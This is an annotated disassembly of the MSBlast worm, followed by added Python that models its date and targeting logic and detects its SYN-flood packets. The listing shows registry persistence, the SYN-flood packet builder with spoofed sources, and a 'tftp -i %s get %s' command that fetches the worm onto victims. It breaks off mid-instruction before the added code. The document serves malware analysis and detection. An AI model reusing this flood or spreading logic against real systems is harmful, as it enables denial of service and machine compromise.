
Writing an autostart entry into the registry

2017-12-05, 19 pages, doc, 54KB, 22 reads

; write the autostart entry into the registry
00401250  55                    push ebp
00401251  89e5                  mov ebp, esp
00401253  81ecac030000          sub esp, 000003ac
00401259  56                    push esi
0040125a  57                    push edi
0040125b  31f6                  xor esi, esi
0040125d  6a00                  push 00000000
0040125f  8d45f8                lea eax, dword ptr [ebp-08]
00401262  50                    push eax
00401263  6a00                  push 00000000
00401265  683f000f00            push 000f003f
0040126a  6a00                  push 00000000
0040126c  6a00                  push 00000000
0040126e  6a00                  push 00000000
00401270  685d484000            push 0040485d                     ; db 'software\microsoft\windows\currentversion\run',0
00401275  6802000080            push 80000002
0040127a  e80d110000            call 0040238c                     ; advapi32.regcreatekeyexa
0040127f  6a32                  push 00000032
00401281  683c404000            push 0040403c                     ; db 'msblast.exe',0
00401286  6a01                  push 00000001
00401288  6a00                  push 00000000
0040128a  6849484000            push 00404849                     ; db 'windows auto update',0
0040128f  ff75f8                push [ebp-08]
00401292  e801110000            call 00402398                     ; advapi32.regsetvalueexa
00401297  ff75f8                push [ebp-08]
0040129a  e8e1100000            call 00402380                     ; advapi32.regclosekey
; create the mutex
0040129f  6843484000            push 00404843                     ; db 'billy',0
004012a4  6a01                  push 00000001
004012a6  6a00                  push 00000000
004012a8  e8a3100000            call 00402350                     ; kernel32.createmutexa
……………………
; pick the random number that decides which data is sent
00401476  e8bd0e0000            call 00402338                     ; kernel32.gettickcount
0040147b  50                    push eax                          ; the gettickcount output is the srand seed
0040147c  e8b30f0000            call 00402434                     ; crtdll.srand
00401481  59                    pop ecx
00401482  e8890f0000            call 00402410                     ; crtdll.rand
00401487  b914000000            mov ecx, 00000014
0040148c  99                    cdq
0040148d  f7f9                  idiv ecx
0040148f  83fa0c                cmp edx, 0000000c
00401492  7d02                  jge 00401496
00401494  31f6                  xor esi, esi
00401496  c7053431400001000000  mov dword ptr [00403134], 00000001
004014a0  e86b0f0000            call 00402410                     ; crtdll.rand
004014a5  b90a000000            mov ecx, 0000000a
004014aa  99                    cdq
004014ab  f7f9                  idiv ecx
004014ad  83fa07                cmp edx, 00000007
004014b0  7e0a                  jle 004014bc
004014b2  c7053431400002000000  mov dword ptr [00403134], 00000002
……………………
00401954  833d3431400001        cmp dword ptr [00403134], 00000001
; this value decides whether the attack code aimed at windows 2000 or at windows xp is sent
0040195b  750c                  jne 00401969
0040195d  c785eceaffff9d130001  mov dword ptr [ebp+ffffeaec], 0100139d   ; use the jump address for windows xp
00401967  eb0a                  jmp 00401973
00401969  c785eceaffff9f751800  mov dword ptr [ebp+ffffeaec], 0018759f   ; use the jump address for windows 2000
……………………
; check the date
004014fc  6a03                  push 00000003                     ; size of buffer
004014fe  8d45f4                lea eax, dword ptr [ebp-0c]
00401501  50                    push eax                          ; buffer
00401502  683c484000            push 0040483c                     ; db 'd',0  fetch the day of the month
00401507  6a00                  push 00000000
00401509  6a00                  push 00000000
0040150b  6809040000            push 00000409                     ; "0409" = "en-us", english (united states)
; judging by the locale argument passed to getdateformata, the author's operating system used the united states locale
00401510  e8e70d0000            call 004022fc                     ; kernel32.getdateformata
00401515  6a03                  push 00000003
00401517  8d45f0                lea eax, dword ptr [ebp-10]
0040151a  50                    push eax
0040151b  683a484000            push 0040483a                     ; db 'm',0  fetch the month
00401520  6a00                  push 00000000
00401522  6a00                  push 00000000
00401524  6809040000            push 00000409
00401529  e8ce0d0000            call 004022fc                     ; kernel32.getdateformata
0040152e  8d45f4                lea eax, dword ptr [ebp-0c]
00401531  50                    push eax
00401532  e8790e0000            call 004023b0                     ; crtdll.atoi
00401537  59                    pop ecx
00401538  83f80f                cmp eax, 0000000f                 ; is the day of the month greater than 15?
0040153b  7f0f                  jg 0040154c                       ; if so, jump to creating the dos thread
0040153d  8d7df0                lea edi, dword ptr [ebp-10]
00401540  57                    push edi
00401541  e86a0e0000            call 004023b0                     ; crtdll.atoi
00401546  59                    pop ecx
00401547  83f808                cmp eax, 00000008                 ; is the month later than august?
0040154a  7e16                  jle 00401562                      ; if so, fall through and create the dos thread
0040154c  8d45fc                lea eax, dword ptr [ebp-04]
0040154f  50                    push eax
00401550  6a00                  push 00000000
00401552  6a00                  push 00000000
00401554  68c11e4000            push 00401ec1                     ; dos subroutine
00401559  6a00                  push 00000000
0040155b  6a00                  push 00000000
0040155d  e8120e0000            call 00402374                     ; kernel32.createthread
……………………
; address-handling subroutine; the converted result is returned in eax
00401e8b  55                    push ebp
00401e8c  89e5                  mov ebp, esp
00401e8e  56                    push esi
00401e8f  57                    push edi
00401e90  ff7508                push [ebp+08]
00401e93  e8d8020000            call 00402170                     ; ws2_32.inet_addr
00401e98  89c7                  mov edi, eax
00401e9a  31f6                  xor esi, esi
00401e9c  83ffff                cmp edi, ffffffff
00401e9f  751a                  jne 00401ebb                      ; an ip address is used as-is; anything else is resolved as a host name first
00401ea1  ff7508                push [ebp+08]
00401ea4  e827030000            call 004021d0                     ; ws2_32.gethostbyname
00401ea9  89c6                  mov esi, eax
00401eab  09f6                  or esi, esi
00401ead  7505                  jne 00401eb4
00401eaf  83c8ff                or eax, ffffffff
00401eb2  eb09                  jmp 00401ebd
00401eb4  8b460c                mov eax, dword ptr [esi+0c]
00401eb7  8b00                  mov eax, dword ptr [eax]
00401eb9  8b38                  mov edi, dword ptr [eax]
00401ebb  89f8                  mov eax, edi
00401ebd  5f                    pop edi
00401ebe  5e                    pop esi
00401ebf  5d                    pop ebp
00401ec0  c3                    ret
; dos subroutine
00401ec1  55                    push ebp
00401ec2  89e5                  mov ebp, esp
00401ec4  51                    push ecx
00401ec5  53                    push ebx
00401ec6  56                    push esi
00401ec7  57                    push edi
00401ec8  c745fc01000000        mov [ebp-04], 00000001
00401ecf  68ec474000            push 004047ec                     ; db 'windowsupdate.com',0
00401ed4  e8b2ffffff            call 00401e8b                     ; address-handling subroutine
00401ed9  59                    pop ecx
00401eda  89c6                  mov esi, eax                      ; esi holds the resolved ip
00401edc  6a01                  push 00000001
00401ede  6a00                  push 00000000
00401ee0  6a00                  push 00000000
00401ee2  68ff000000            push 000000ff
00401ee7  6a03                  push 00000003
00401ee9  6a02                  push 00000002
00401eeb  e84c030000            call 0040223c                     ; ws2_32.wsasocketa
00401ef0  89c7                  mov edi, eax
00401ef2  83f8ff                cmp eax, ffffffff
00401ef5  7504                  jne 00401efb
00401ef7  31c0                  xor eax, eax
00401ef9  eb34                  jmp 00401f2f
00401efb  6a04                  push 00000004
00401efd  8d45fc                lea eax, dword ptr [ebp-04]
00401f00  50                    push eax
00401f01  6a02                  push 00000002
00401f03  6a00                  push 00000000
00401f05  57                    push edi
00401f06  e8ad020000            call 004021b8                     ; ws2_32.setsockopt
00401f0b  83f8ff                cmp eax, ffffffff
00401f0e  7504                  jne 00401f14                      ; jump on success
00401f10  31c0                  xor eax, eax
00401f12  eb1b                  jmp 00401f2f
00401f14  57                    push edi
00401f15  56                    push esi
00401f16  e81b000000            call 00401f36                     ; syn flood send routine
00401f1b  83c408                add esp, 00000008
00401f1e  6a14                  push 00000014
00401f20  e837040000            call 0040235c                     ; kernel32.sleep
00401f25  ebed                  jmp 00401f14
00401f27  57                    push edi
00401f28  e8c7020000            call 004021f4                     ; ws2_32.closesocket
00401f2d  31c0                  xor eax, eax
00401f2f  5f                    pop edi
00401f30  5e                    pop esi
00401f31  5b                    pop ebx
00401f32  c9                    leave
00401f33  c20400                ret 0004
; syn flood send routine
00401f36  55                    push ebp
00401f37  89e5                  mov ebp, esp
00401f39  81ec9c000000          sub esp, 0000009c
00401f3f  53                    push ebx
00401f40  56                    push esi
00401f41  57                    push edi
00401f42  8d7d9c                lea edi, dword ptr [ebp-64]
00401f45  8d35b0474000          lea esi, dword ptr [004047b0]
00401f4b  b90f000000            mov ecx, 0000000f
00401f50  f3                    repz
00401f51  a5                    movsd
00401f52  66c7857effffff5000    mov word ptr [ebp+ffffff7e], 0050
00401f5b  e8d8030000            call 00402338                     ; kernel32.gettickcount
00401f60  50                    push eax                          ; the gettickcount result is the srand seed
00401f61  e8ce040000            call 00402434                     ; crtdll.srand
00401f66  e8a5040000            call 00402410                     ; crtdll.rand
00401f6b  898568ffffff          mov dword ptr [ebp+ffffff68], eax
00401f71  e89a040000            call 00402410                     ; crtdll.rand
00401f76  b9ff000000            mov ecx, 000000ff
00401f7b  99                    cdq
00401f7c  f7f9                  idiv ecx
00401f7e  52                    push edx                          ; rand
00401f7f  8bbd68ffffff          mov edi, dword ptr [ebp+ffffff68]
00401f85  89f8                  mov eax, edi
00401f87  b9ff000000            mov ecx, 000000ff
00401f8c  99                    cdq
00401f8d  f7f9                  idiv ecx
00401f8f  52                    push edx                          ; rand
00401f90  ff3538314000          push dword ptr [00403138]         ; these two addresses hold the first two bytes of the local ip
00401f96  ff3514304000          push dword ptr [00403014]         ; the syn flood source ip is not fully random: the first two bytes are real, the last two are random.
; this is probably because some network devices do not allow ips outside the local network to connect outward
00401f9c  682b484000            push 0040482b                     ; db '%i.%i.%i.%i',0
00401fa1  8dbd6effffff          lea edi, dword ptr [ebp+ffffff6e]
00401fa7  57                    push edi                          ; the generated ip
00401fa8  e87b040000            call 00402428                     ; crtdll.sprintf
00401fad  8d856effffff          lea eax, dword ptr [ebp+ffffff6e]
00401fb3  50                    push eax
00401fb4  e8d2feffff            call 00401e8b                     ; address-handling subroutine
00401fb9  89c3                  mov ebx, eax                      ; save the converted ip in ebx
; from here on the syn flood packet is built
00401fbb  66c745800200          mov [ebp-80], 0002
00401fc1  0fb7857effffff        movzx eax, word ptr [ebp+ffffff7e]
00401fc8  50                    push eax                          ; destination port 80
00401fc9  e88a010000            call 00402158                     ; ws2_32.htons
00401fce  89c7                  mov edi, eax
00401fd0  66897d82              mov word ptr [ebp-7e], di
00401fd4  8b4508                mov eax, dword ptr [ebp+08]
00401fd7  894584                mov dword ptr [ebp-7c], eax
00401fda  c645ec45              mov [ebp-14], 45
00401fde  6a28                  push 00000028
00401fe0  e873010000            call 00402158                     ; ws2_32.htons
00401fe5  89c7                  mov edi, eax
00401fe7  66897dee              mov word ptr [ebp-12], di
00401feb  66c745f00100          mov [ebp-10], 0001                ; ident
00401ff1  66c745f20000          mov [ebp-0e], 0000                ; fragment offset: 0
00401ff7  c645f480              mov [ebp-0c], 80                  ; ttl: 128
00401ffb  c645f506              mov [ebp-0b], 06                  ; protocol: tcp
00401fff  66c745f60000          mov [ebp-0a], 0000
00402005  8b4508                mov eax, dword ptr [ebp+08]
00402008  8945fc                mov dword ptr [ebp-04], eax
0040200b  0fb7857effffff        movzx eax, word ptr [ebp+ffffff7e]
00402012  50                    push eax
00402013  e840010000            call 00402158                     ; ws2_32.htons
00402018  89c7                  mov edi, eax
0040201a  66897dda              mov word ptr [ebp-26], di
0040201e  8365e000              and dword ptr [ebp-20], 00000000
00402022  c645e450              mov [ebp-1c], 50
00402026  c645e502              mov [ebp-1b], 02
0040202a  6800400000            push 00004000                     ; tcp window: 16384
0040202f  e824010000            call 00402158                     ; ws2_32.htons
00402034  89c7                  mov edi, eax
00402036  66897de6              mov word ptr [ebp-1a], di         ; [ebp-1a] tcp window: 16384
0040203a  66c745ea0000          mov [ebp-16], 0000
00402040  66c745e80000          mov [ebp-18], 0000
00402046  8b45fc                mov eax, dword ptr [ebp-04]
00402049  894594                mov dword ptr [ebp-6c], eax       ; [ebp-6c] destination ip
0040204c  c6459800              mov [ebp-68], 00
00402050  c6459906              mov [ebp-67], 06
00402054  6a14                  push 00000014
00402056  e8fd000000            call 00402158                     ; ws2_32.htons
0040205b  89c7                  mov edi, eax
0040205d  66897d9a              mov word ptr [ebp-66], di
00402061  895df8                mov dword ptr [ebp-08], ebx
00402064  e8a7030000            call 00402410                     ; crtdll.rand
00402069  b9e8030000            mov ecx, 000003e8
0040206e  99                    cdq
0040206f  f7f9                  idiv ecx
00402071  89d7                  mov edi, edx
00402073  81c7e8030000          add edi, 000003e8
00402079  81e7ffff0000          and edi, 0000ffff
0040207f  57                    push edi                          ; randomly generated source port
00402080  e8d3000000            call 00402158                     ; ws2_32.htons
00402085  89c7                  mov edi, eax
00402087  66897dd8              mov word ptr [ebp-28], di
0040208b  e880030000            call 00402410                     ; crtdll.rand
00402090  898564ffffff          mov dword ptr [ebp+ffffff64], eax
00402096  e875030000            call 00402410                     ; crtdll.rand; random seq number
0040209b  8bbd64ffffff          mov edi, dword ptr [ebp+ffffff64]
004020a1  c1e710                shl edi, 10
004020a4  09c7                  or edi, eax
004020a6  81e7ffff0000          and edi, 0000ffff
004020ac  57                    push edi
004020ad  e8a6000000            call 00402158                     ; ws2_32.htons
004020b2  89c7                  mov edi, eax
004020b4  81e7ffff0000          and edi, 0000ffff
004020ba  897ddc                mov dword ptr [ebp-24], edi
004020bd  895d90                mov dword ptr [ebp-70], ebx
004020c0  6a0c                  push 0000000c
004020c2  8d4590                lea eax, dword ptr [ebp-70]
004020c5  50                    push eax
004020c6  8d459c                lea eax, dword ptr [ebp-64]
004020c9  50                    push eax
004020ca  e81d030000            call 004023ec                     ; crtdll.memcpy
004020cf  6a14                  push 00000014
004020d1  8d45d8                lea eax, dword ptr [ebp-28]
004020d4  50                    push eax
004020d5  8d45a8                lea eax, dword ptr [ebp-58]
004020d8  50                    push eax
004020d9  e80e030000            call 004023ec                     ; crtdll.memcpy
004020de  6a20                  push 00000020
004020e0  8d459c                lea eax, dword ptr [ebp-64]
004020e3  50                    push eax
004020e4  e857fdffff            call 00401e40
004020e9  89c7                  mov edi, eax
004020eb  66897de8              mov word ptr [ebp-18], di
004020ef  6a14                  push 00000014
004020f1  8d45ec                lea eax, dword ptr [ebp-14]
004020f4  50                    push eax
004020f5  8d459c                lea eax, dword ptr [ebp-64]
004020f8  50                    push eax
004020f9  e8ee020000            call 004023ec                     ; crtdll.memcpy
004020fe  6a14                  push 00000014
00402100  8d45d8                lea eax, dword ptr [ebp-28]
00402103  50                    push eax
00402104  8d45b0                lea eax, dword ptr [ebp-50]       ; [ebp-50] source port
00402107  50                    push eax
00402108  e8df020000            call 004023ec                     ; crtdll.memcpy
0040210d  6a04                  push 00000004
0040210f  6a00                  push 00000000
00402111  8d45c4                lea eax, dword ptr [ebp-3c]
00402114  50                    push eax
00402115  e8de020000            call 004023f8                     ; crtdll.memset
0040211a  6a28                  push 00000028
0040211c  8d459c                lea eax, dword ptr [ebp-64]
0040211f  50                    push eax
00402120  e81bfdffff            call 00401e40
00402125  89c7                  mov edi, eax
00402127  66897df6              mov word ptr [ebp-0a], di
0040212b  6a14                  push 00000014
0040212d  8d45ec                lea eax, dword ptr [ebp-14]
00402130  50                    push eax
00402131  8d459c                lea eax, dword ptr [ebp-64]
00402134  50                    push eax
00402135  e8b2020000            call 004023ec                     ; crtdll.memcpy
0040213a  83c478                add esp, 00000078
0040213d  6a10                  push 00000010
0040213f  8d4580                lea eax, dword ptr [ebp-80]
00402142  50                    push eax
00402143  6a00                  push 00000000
00402145  6a28                  push 00000028
00402147  8d459c                lea eax, dword ptr [ebp-64]
0040214a  50                    push eax
0040214b  ff750c                push [ebp+0c]
0040214e  e859000000            call 004021ac                     ; ws2_32.sendto  send the packet
00402153  5f                    pop edi
00402154  5e                    pop esi
00402155  5b                    pop ebx
00402156  c9                    leave
00402157  c3                    ret
………………
; tftp server setup routine
00401576  55                    push ebp
00401577  89e5                  mov ebp, esp
00401579  81ec2c040000          sub esp, 0000042c
0040157f  53                    push ebx
00401580  56                    push esi
00401581  57                    push edi
00401582  c7053840400001000000  mov dword ptr [00404038], 00000001
0040158c  6a00                  push 00000000
0040158e  6a02                  push 00000002                     ; sock_dgram, i.e. udp
00401590  6a02                  push 00000002
00401592  e82d0c0000            call 004021c4                     ; ws2_32.socket
00401597  a324314000            mov dword ptr [00403124], eax
0040159c  83f8ff                cmp eax, ffffffff
0040159f  0f8445010000          je 004016ea
004015a5  6a10                  push 00000010
004015a7  6a00                  push 00000000
004015a9  8d85d8fdffff          lea eax, dword ptr [ebp+fffffdd8]
004015af  50                    push eax
004015b0  e8430e0000            call 004023f8                     ; crtdll.memset
004015b5  83c40c                add esp, 0000000c
004015b8  66c785d8fdffff0200    mov word ptr [ebp+fffffdd8], 0002
004015c1  6a45                  push 00000045                     ; listen on port 69
004015c3  e8900b0000            call 00402158                     ; ws2_32.htons
004015c8  89c2                  mov edx, eax
004015ca  668995dafdffff        mov word ptr [ebp+fffffdda], dx
004015d1  83a5dcfdffff00        and dword ptr [ebp+fffffddc], 00000000
004015d8  6a10                  push 00000010
004015da  8d85d8fdffff          lea eax, dword ptr [ebp+fffffdd8]
004015e0  50                    push eax
004015e1  ff3524314000          push dword ptr [00403124]
004015e7  e8f00b0000            call 004021dc                     ; ws2_32.bind
004015ec  09c0                  or eax, eax
004015ee  0f85f6000000          jne 004016ea
004015f4  c785f8fdffff10000000  mov dword ptr [ebp+fffffdf8], 00000010
004015fe  8d85f8fdffff          lea eax, dword ptr [ebp+fffffdf8]
00401604  50                    push eax
00401605  8d85e8fdffff          lea eax, dword ptr [ebp+fffffde8]
0040160b  50                    push eax
0040160c  6a00                  push 00000000
0040160e  6804020000            push 00000204
00401613  8d85d4fbffff          lea eax, dword ptr [ebp+fffffbd4]
00401619  50                    push eax
0040161a  ff3524314000          push dword ptr [00403124]
00401620  e8630b0000            call 00402188                     ; ws2_32.recvfrom
00401625  83f801                cmp eax, 00000001                 ; if a request ...
00401628  0f8cbc000000          jl 004016ea
0040162e  31db                  xor ebx, ebx
00401630  6837484000            push 00404837                     ; db 'rb',0  open the file read-only in binary mode
00401635  6820304000            push 00403020                     ; offset of the absolute path of the current file
0040163a  e8950d0000            call 004023d4                     ; crtdll.fopen
; this worm sets up tftp the same way nimda did back then: whatever file name is requested, it returns the worm file.
; so this tftp server cannot leak system files. unlike nimda, the tftp server only runs after a machine has been attacked successfully,
; so it is perfectly normal not to see udp/69 listening on a system infected with msblast.exe.
………………
; create the tftp server thread, then send the tftp command that transfers the file and runs it
00401cbd  8d85cce6ffff          lea eax, dword ptr [ebp+ffffe6cc]
00401cc3  50                    push eax
00401cc4  6a00                  push 00000000
00401cc6  6a00                  push 00000000
00401cc8  6876154000            push 00401576                     ; tftp server setup routine
00401ccd  6a00                  push 00000000
00401ccf  6a00                  push 00000000
00401cd1  e89e060000            call 00402374                     ; kernel32.createthread
00401cd6  8985c0edffff          mov dword ptr [ebp+ffffedc0], eax
00401cdc  6a50                  push 00000050
00401cde  e879060000            call 0040235c                     ; kernel32.sleep
00401ce3  683c404000            push 0040403c                     ; db 'msblast.exe',0
00401ce8  6800304000            push 00403000                     ; local ip
00401ced  680c484000            push 0040480c                     ; db 'tftp -i %s get %s',0
00401cf2  8d85fcedffff          lea eax, dwor
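The two decisions annotated in the listing, the date check in front of CreateThread and the rand()-driven choice of jump address, as a Python model. This is an added example, not code from the document; the CrtRand class assumes crtdll.dll's rand() uses the Microsoft CRT LCG constants, and all function names are chosen here.

```python
from datetime import date, timedelta

XP_RETURN_ADDRESS = 0x0100139D       # stored at [ebp+ffffeaec] when [00403134] == 1
WIN2000_RETURN_ADDRESS = 0x0018759F  # stored otherwise

def dos_thread_starts(day: int, month: int) -> bool:
    """cmp eax,0f / jg  then  cmp eax,08 / jle: the DoS thread is created
    when the day of the month exceeds 15 or the month is later than August."""
    return day > 15 or month > 8

def dos_days_in_year(year: int) -> int:
    """Count the calendar days in `year` on which the date check passes."""
    d, count = date(year, 1, 1), 0
    while d.year == year:
        count += dos_thread_starts(d.day, d.month)
        d += timedelta(days=1)
    return count

def target_flag(rand_value: int) -> int:
    """[00403134] is first set to 1, then overwritten with 2 when rand() % 10 > 7."""
    return 2 if rand_value % 10 > 7 else 1

def return_address(flag: int) -> int:
    """Jump address selected by the cmp at 00401954."""
    return XP_RETURN_ADDRESS if flag == 1 else WIN2000_RETURN_ADDRESS

class CrtRand:
    """Assumed model of the CRT rand(): 32-bit LCG, 15-bit output (0..32767).
    Assumption: crtdll.dll uses the same constants as later msvcrt builds."""
    def __init__(self, seed: int):
        self.state = seed & 0xFFFFFFFF   # srand(GetTickCount()) in the listing
    def rand(self) -> int:
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF

def win2000_fraction(seed: int, runs: int) -> float:
    """Fraction of runs that end up with the Windows 2000 address; the
    rand() % 10 > 7 test makes this roughly 0.2 whatever the seed is."""
    rng = CrtRand(seed)
    return sum(target_flag(rng.rand()) == 2 for _ in range(runs)) / runs

if __name__ == "__main__":
    print("days per year on which the DoS thread starts (2003):", dos_days_in_year(2003))
    print("share of infections that target Windows 2000:", win2000_fraction(0x1234, 10_000))
```

The date window is the 16th to the last day of every month plus every day from September onward, which is why the flood against windowsupdate.com was expected from 16 August on.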
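A defender's view of the packet the syn flood send routine assembles: an added example, not code from the document, that parses a 40-byte IP+TCP header and reports which of the fixed field values visible in the listing (total length 0x28, ident 1, ttl 128, SYN only, window 0x4000, destination port 80, source port 1000 + rand() % 1000, source ip sharing the host's first two octets) are present, so the listing can be turned into a detection rule. The host ip, the sample packet and the function names are constructed here.

```python
import struct
from ipaddress import IPv4Address

def ip_header_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def blaster_syn_indicators(pkt: bytes, host_ip: str) -> dict:
    """Map indicator name -> bool for one raw IPv4 packet (first 40 bytes used).
    The expected values are the constants written into the headers in the
    listing; host_ip is the address of the machine the packet was seen on."""
    if len(pkt) < 40:
        return {"ipv4_plus_tcp_header": False}
    (ver_ihl, _tos, tlen, ident, _frag, ttl, proto, hcs,
     src, _dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    (sport, dport, _seq, _ack, off_res, flags, win,
     _tcs, _urg) = struct.unpack("!HHIIBBHHH", pkt[20:40])
    zeroed = pkt[:10] + b"\x00\x00" + pkt[12:20]   # ip header with checksum cleared
    src_ip, host = IPv4Address(src), IPv4Address(host_ip)
    return {
        "ipv4_plus_tcp_header": ver_ihl == 0x45 and proto == 6 and off_res >> 4 == 5,
        "ip_checksum_valid": ip_header_checksum(zeroed) == hcs,
        "total_length_40": tlen == 40,
        "ident_1": ident == 1,
        "ttl_128": ttl == 128,
        "syn_only": flags == 0x02,
        "window_16384": win == 16384,
        "dst_port_80": dport == 80,
        "src_port_1000_1999": 1000 <= sport <= 1999,
        "spoofed_from_host_prefix": src_ip.packed[:2] == host.packed[:2] and src_ip != host,
    }

def matches_blaster_profile(pkt: bytes, host_ip: str) -> bool:
    """Coarse packet-level rule: every indicator must hold."""
    return all(blaster_syn_indicators(pkt, host_ip).values())

# Constructed sample (not a capture): 10.0.123.45:1234 -> 192.0.2.10:80, SYN,
# window 16384, ident 1, ttl 128; the tcp checksum is left zero, it is not checked.
SAMPLE_SYN = bytes.fromhex(
    "45000028" "00010000" "8006f397" "0a007b2d" "c000020a"   # ipv4 header
    "04d20050" "1a2b3c4d" "00000000" "50024000" "00000000"   # tcp header
)
```

The per-indicator dict is more useful than the boolean in practice: a host whose own packets trip only "spoofed_from_host_prefix" and "src_port_1000_1999" is worth a look even when the rest of the profile differs.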